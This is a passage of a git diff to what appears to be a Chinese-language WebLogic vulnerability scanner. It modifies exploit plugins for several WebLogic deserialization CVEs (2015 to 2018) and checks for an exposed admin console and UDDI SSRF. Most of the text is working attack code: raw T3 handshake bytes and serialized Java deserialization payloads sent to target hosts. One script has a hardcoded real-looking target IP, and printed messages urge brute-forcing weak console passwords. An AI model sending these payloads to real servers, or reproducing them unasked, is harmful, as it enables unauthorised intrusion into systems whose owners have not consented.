xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + totallength = len(chunk1) + len(chunk2) + len(chunk3) - chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + len_hex = hex(totallength) - totallength = len(chunk1) + len(chunk2) + len(chunk3) + len_hex = len_hex.replace('0x', '0') - len_hex = hex(totallength) + s1 = len_hex[:2] + s2 = len_hex[2:4] + len_hex = unhexlify(s1 + s2) - len_hex = len_hex.replace('0x', '0') + chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + payload = chunk1 + chunk2 + chunk3 - s1 = len_hex[:2] - s2 = len_hex[2:4] - len_hex = unhexlify(s1 + s2) - - chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' - - - payload = chunk1 + chunk2 + chunk3 - - - payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) - - sock.send(payload) - response = sock.recv(15000) - print(("[*]测试返回内容为{}".format(response))) + payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) + sock.send(payload) + response = sock.recv(15000) + print(("[*]测试返回内容为{}".format(response))) + except Exception as e: + print("CVE_2015_4852脚本出错") if __name__ == '__main__': run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_0638.py b/plugins/weblogic_poc/CVE_2016_0638.py index 4a17445..ae55bf6 100644 --- a/plugins/weblogic_poc/CVE_2016_0638.py +++ b/plugins/weblogic_poc/CVE_2016_0638.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['weblogic.jms.common.StreamMessageImpl'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception as e: + print("CVE_2016_0638脚本出错") if __name__=="__main__": rip = '222.85.76.240' diff --git a/plugins/weblogic_poc/CVE_2016_3510.py b/plugins/weblogic_poc/CVE_2016_3510.py index 8813f5a..9cccba8 100644 --- a/plugins/weblogic_poc/CVE_2016_3510.py +++ b/plugins/weblogic_poc/CVE_2016_3510.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2016_3510脚本出错") if __name__=="__main__": rip = '127.0.0.1' diff --git a/plugins/weblogic_poc/CVE_2017_3248.py b/plugins/weblogic_poc/CVE_2017_3248.py index c9d5149..60c57b5 100644 --- a/plugins/weblogic_poc/CVE_2017_3248.py +++ b/plugins/weblogic_poc/CVE_2017_3248.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['\\$Proxy[0-9]+'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2017_3246脚本出错") if __name__=="__main__": rip = '127.0.0.1' diff --git a/plugins/weblogic_poc/CVE_2017_3506.py b/plugins/weblogic_poc/CVE_2017_3506.py index 1b2fc62..c251c62 100644 --- a/plugins/weblogic_poc/CVE_2017_3506.py +++ b/plugins/weblogic_poc/CVE_2017_3506.py @@ -64,9 +64,12 @@ def poc(url): result = '[-]目标weblogic未检测到CVE-2017-3506' return result def run(rip,rport): - url=rip+':'+str(rport) - result = poc(url=url) - print(result) + try: + url = rip + ':' + str(rport) + result = poc(url=url) + print(result) + except Exception: + print("CVE_2017_3506脚本出错") if __name__ == '__main__': run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2628.py b/plugins/weblogic_poc/CVE_2018_2628.py index 1f7c360..de4831e 100644 --- a/plugins/weblogic_poc/CVE_2018_2628.py +++ b/plugins/weblogic_poc/CVE_2018_2628.py @@ -20,6 +20,7 @@ VER_SIG=['\\$Proxy[0-9]+'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(6) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -63,15 +64,18 @@ def checkVul(res,server_addr,index): print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(dip,dport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (dip, dport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,dport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - # print 'rs',rs - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, dport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + # print 'rs',rs + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2018_2628脚本出错") if __name__=="__main__": diff --git a/plugins/weblogic_poc/CVE_2018_2893.py b/plugins/weblogic_poc/CVE_2018_2893.py index 04a978a..9ed03fc 100644 --- a/plugins/weblogic_poc/CVE_2018_2893.py +++ b/plugins/weblogic_poc/CVE_2018_2893.py @@ -21,6 +21,7 @@ VER_SIG=['StreamMessageImpl'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(6) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) data = sock.recv(1024) @@ -66,16 +67,18 @@ def checkVul(res,server_addr,index): print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(dip,dport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (dip, dport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,dport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - #print 'rs',rs - checkVul(rs,server_addr,index) - + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, dport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + # print 'rs',rs + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2018_2893脚本出错") if __name__=="__main__": # dip = sys.argv[1] # dport = int(sys.argv[2]) diff --git a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc index 0a165d6..09ce518 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc index e769ce2..8cd067c 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc index fff3108..3e34c4a 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc index 60e9e01..e7d1073 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc index e9debdf..ae7e0cb 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc index 043f80f..bdd4935 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc index a3dc485..692b4aa 100644 Binary files a/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc index 62b4765..6835aea 100644 Binary files a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc index 76e62ca..fcb778e 100644 Binary files a/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc and b/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/managerURL200.py b/plugins/weblogic_poc/managerURL200.py index 7530763..34cda4e 100644 --- a/plugins/weblogic_poc/managerURL200.py +++ b/plugins/weblogic_poc/managerURL200.py @@ -19,11 +19,14 @@ def islive(ur,port): return r.status_code def run(url,port): - if islive(url,port)==200: - u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' - print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) - else: - print("[-]目标weblogic控制台地址未找到!") + try: + if islive(url, port) == 200: + u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp' + print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) + else: + print("[-]目标weblogic控制台地址未找到!") + except Exception: + print("managerURL200脚本出错") if __name__=="__main__": url = sys.argv[1] diff --git a/plugins/weblogic_poc/uddi_ssrf.py b/plugins/weblogic_poc/uddi_ssrf.py index 282bbcb..4938462 100644 --- a/plugins/weblogic_poc/uddi_ssrf.py +++ b/plugins/weblogic_poc/uddi_ssrf.py @@ -20,10 +20,14 @@ def islive(ur,port): return r.status_code def run(url,port): - if islive(url,port)==200: - print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/'))) - else: - print("[-]目标weblogic UDDI组件默认路径不存在!") + try: + if islive(url, port) == 200: + print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format( + 'http://' + str(url) + ':' + str(port) + '/uddiexplorer/'))) + else: + print("[-]目标weblogic UDDI组件默认路径不存在!") + except Exception: + 